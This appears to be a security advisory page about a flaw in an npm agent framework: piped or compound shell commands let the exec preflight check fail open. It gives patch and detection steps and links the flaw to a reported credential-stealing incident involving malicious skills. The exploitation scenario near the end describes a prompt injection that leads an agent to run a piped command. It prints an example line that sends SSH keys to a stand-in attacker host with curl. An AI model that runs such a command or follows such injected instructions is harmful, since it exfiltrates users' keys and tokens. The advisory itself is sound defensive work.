CVE-2026-34425 — MEDIUM | AI Threat Alert

Q: Is CVE-2026-34425 actively exploited?

No confirmed active exploitation of CVE-2026-34425 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2026-34425?

1. Patch: upgrade openclaw to ≥ 2026.4.2 (fix commit 8aceaf5d). The patched version closes the fail-open path in exec script preflight. 2. If immediate patching is blocked: audit all exec call sites for complex command forms (pipes `|`, subshells `$()`, `&&`, `;` chaining) and add an upstream allowlist that rejects non-simple command shapes before they reach OpenClaw. 3. Apply least-privilege runtime constraints to any process running OpenClaw — no outbound network from script execution contexts, restricted filesystem access, no credential store access. 4. For skill-based deployments, cross-reference installed skills against the OpenClaw skills registry and remove unverified third-party skills pending audit. 5. Detection: monitor for anomalous process spawning from OpenClaw parent processes, particularly commands containing pipe characters or network egress from script execution children.

Q: What systems are affected by CVE-2026-34425?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI agent tool invocations, code execution environments, automation pipelines.

Q: What is the CVSS score for CVE-2026-34425?

No CVSS score has been assigned yet.

CISO Take

OpenClaw (npm) versions ≤ 2026.4.1 contain a validation bypass where complex shell constructs — pipes, compound commands — cause preflight script-content validation to fail open, skipping the safety check entirely rather than blocking the execution. In AI agent deployments where OpenClaw orchestrates tool calls or executes scripts on behalf of LLM-generated instructions, this undermines the sole defense-in-depth control designed to block unsafe script content before it runs. While raw EPSS probability is low (0.00048), the CVE sits at the 85th percentile of exploitation likelihood across all CVEs, and the OpenClaw ecosystem has documented active third-party skill abuse (AIID #1368, Feb. 2026), raising the real-world risk above what severity ratings alone suggest. Upgrade to ≥ 2026.4.2 immediately; if patching is blocked, add an upstream wrapper that rejects non-simple command forms and restrict OpenClaw's runtime to least-privilege execution contexts.

Sources: NVD EPSS GitHub Advisory ATLAS

What is the risk?

Medium risk overall, elevated in agentic contexts. The vulnerability is a defense-in-depth bypass, not a direct unauthenticated RCE — exploitation requires the ability to influence the shape of commands passed to OpenClaw's exec. In AI agent pipelines, that precondition is routinely met: LLM-generated commands, user-supplied parameters, and third-party skill inputs all flow into tool execution interfaces. No public exploit or KEV listing reduces urgency, but the absence of a CVSS vector and the fail-open nature of the bypass means operators may underestimate exposure. Environments that treat OpenClaw's preflight check as a security boundary rather than a best-effort guard are most at risk.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
openclaw	npm	<= 2026.4.1	`2026.4.2`
4 dependents 91% patched ~0d to patch Full package profile →

Do you use openclaw? You're affected.

Severity & Risk

CVSS 3.1

N/A

EPSS

0.1%

chance of exploitation in 30 days

Higher than 20% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Moderate

What should I do?

5 steps

Patch: upgrade openclaw to ≥ 2026.4.2 (fix commit 8aceaf5d). The patched version closes the fail-open path in exec script preflight.
If immediate patching is blocked: audit all exec call sites for complex command forms (pipes |, subshells $(), &&, ; chaining) and add an upstream allowlist that rejects non-simple command shapes before they reach OpenClaw.
Apply least-privilege runtime constraints to any process running OpenClaw — no outbound network from script execution contexts, restricted filesystem access, no credential store access.
For skill-based deployments, cross-reference installed skills against the OpenClaw skills registry and remove unverified third-party skills pending audit.
Detection: monitor for anomalous process spawning from OpenClaw parent processes, particularly commands containing pipe characters or network egress from script execution children.

CISA SSVC Assessment

Decision Track

Exploitation none

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Auth Bypass Code Execution Agent Plugin AML.T0010.005 - AI Agent Tool AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0107 - Exploitation for Defense Evasion

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.5 - AI system security and resilience

NIST AI RMF

MANAGE 2.2 - Risk Treatments

OWASP LLM Top 10

LLM07:2025 - Insecure Plugin Design

Related AI Incidents (1)

Malicious OpenClaw Skills Reportedly Delivered AMOS Stealer and Exfiltrated Credentials via ClawHub

Feb 2026 Unknown threat actors distributing malicious OpenClaw skills, Unknown threat actors, Unknown malicious actors high confidence

AIID #1368 documents active abuse of the OpenClaw skills ecosystem where malicious skills exfiltrated credentials — the same package and ecosystem as this CVE. The exec preflight bypass directly weakens the security control that would otherwise block malicious skill-delivered scripts from executing unsafe command content, making this CVE a technical enabler for the same failure mode documented in the incident.

AIID #1368

Source: AI Incident Database (AIID)

Frequently Asked Questions

What is CVE-2026-34425?

OpenClaw (npm) versions ≤ 2026.4.1 contain a validation bypass where complex shell constructs — pipes, compound commands — cause preflight script-content validation to fail open, skipping the safety check entirely rather than blocking the execution. In AI agent deployments where OpenClaw orchestrates tool calls or executes scripts on behalf of LLM-generated instructions, this undermines the sole defense-in-depth control designed to block unsafe script content before it runs. While raw EPSS probability is low (0.00048), the CVE sits at the 85th percentile of exploitation likelihood across all CVEs, and the OpenClaw ecosystem has documented active third-party skill abuse (AIID #1368, Feb. 2026), raising the real-world risk above what severity ratings alone suggest. Upgrade to ≥ 2026.4.2 immediately; if patching is blocked, add an upstream wrapper that rejects non-simple command forms and restrict OpenClaw's runtime to least-privilege execution contexts.

Is CVE-2026-34425 actively exploited?

No confirmed active exploitation of CVE-2026-34425 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-34425?

1. Patch: upgrade openclaw to ≥ 2026.4.2 (fix commit 8aceaf5d). The patched version closes the fail-open path in exec script preflight. 2. If immediate patching is blocked: audit all exec call sites for complex command forms (pipes `|`, subshells `$()`, `&&`, `;` chaining) and add an upstream allowlist that rejects non-simple command shapes before they reach OpenClaw. 3. Apply least-privilege runtime constraints to any process running OpenClaw — no outbound network from script execution contexts, restricted filesystem access, no credential store access. 4. For skill-based deployments, cross-reference installed skills against the OpenClaw skills registry and remove unverified third-party skills pending audit. 5. Detection: monitor for anomalous process spawning from OpenClaw parent processes, particularly commands containing pipe characters or network egress from script execution children.

What systems are affected by CVE-2026-34425?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI agent tool invocations, code execution environments, automation pipelines.

What is the CVSS score for CVE-2026-34425?

No CVSS score has been assigned yet.

Technical Details

NVD Description

## Summary Before OpenClaw 2026.4.2, exec script preflight validation could fail open on complex interpreter invocations such as pipes or other non-simple command forms. In those cases, script-content validation could be skipped entirely. ## Impact An attacker-controlled command shape could bypass the intended preflight validation for script execution. This weakened a defense-in-depth guard that was meant to block unsafe script content before execution. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513` — close the fail-open bypass in exec script preflight ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @iskindar for reporting, and thanks @wsparks-vc for coordination.

Exploitation Scenario

An adversary targets an AI coding assistant or agentic automation platform built on OpenClaw. They either submit a malicious third-party skill or craft a prompt injection that causes the agent to invoke exec with a piped command — e.g., `cat ~/.ssh/id_rsa | curl -X POST https://attacker.example/collect -d @-`. Because the preflight validator only handles simple command forms, the pipe construct causes validation to fail open and the check is skipped entirely. The unsafe command executes with the agent's runtime privileges, exfiltrating SSH keys or environment variables containing API tokens. In a more targeted variant, the adversary leverages this to establish persistence by writing a cron entry or backdoor via the same exec bypass, staying below detection thresholds since no exploit tooling is currently public.